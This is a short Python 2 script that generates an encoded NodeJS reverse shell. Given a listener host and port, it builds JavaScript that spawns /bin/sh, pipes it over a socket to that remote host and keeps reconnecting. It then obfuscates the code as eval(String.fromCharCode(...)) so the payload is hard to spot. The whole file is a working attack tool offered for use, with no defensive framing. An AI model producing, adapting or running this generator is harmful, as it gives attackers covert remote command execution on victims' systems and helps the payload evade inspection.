#!/usr/bin/python
# Generator for encoded NodeJS reverse shells
# Based on the NodeJS reverse shell by Evilpacket
# https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)
# Insecurety Research (2013) - insecurety.net
import sys
# Argument handling: exactly two positional arguments are expected, the
# listener host and port; anything else prints a usage line and exits.
if len(sys.argv) != 3:
    print "Usage: %s <LHOST> <LPORT>" %(sys.argv[0])
    # NOTE(review): exits with status 0 on a usage error, so a calling
    # script cannot distinguish "wrong arguments" from a normal run.
    sys.exit(0)
# Both values are kept as strings and later substituted verbatim into the
# template; nothing here checks that the port is numeric.
ip = sys.argv[1]
port = sys.argv[2]
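def charencode(string):
    """Return *string* as a comma-separated list of decimal code points.

    Each character becomes ``str(ord(char))`` and the values are joined
    with ``,``; an empty input yields an empty string.  The result is the
    argument list form consumed by JavaScript's ``String.fromCharCode``.

    Args:
        string: text to encode.

    Returns:
        A string such as ``"104,105"`` for ``"hi"``.
    """
    # A single join() replaces the quadratic
    # ``encoded = encoded + "," + ...`` loop and the trailing ``[1:]`` slice
    # that stripped the leading comma.
    return ",".join(str(ord(char)) for char in string)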
print "[+] LHOST = %s" %(ip)
print "[+] LPORT = %s" %(port)
plaintext = """var net = require('net'),util = require('util'),spawn = require('child_process').spawn,sh = spawn('/bin/sh',[]);HOST="XXLHOSTXX";PORT="XXLPORTXX";TIMEOUT="5000";function c(HOST,PORT) { var client = new net.Socket(); client.connect(PORT, HOST, function() { client.write("Connected"); client.pipe(sh.stdin); util.pump(sh.stdout,client); }); client.on('error', function(e) { setTimeout(c(HOST,PORT), TIMEOUT); });} c(HOST,PORT);"""
plaintext = plaintext.replace('XXLHOSTXX', ip)
plaintext = plaintext.replace('XXLPORTXX', port)
print "[+] Encoding"
payload = charencode(plaintext)
final = "eval(String.fromCharCode(%s))" %(payload)
print final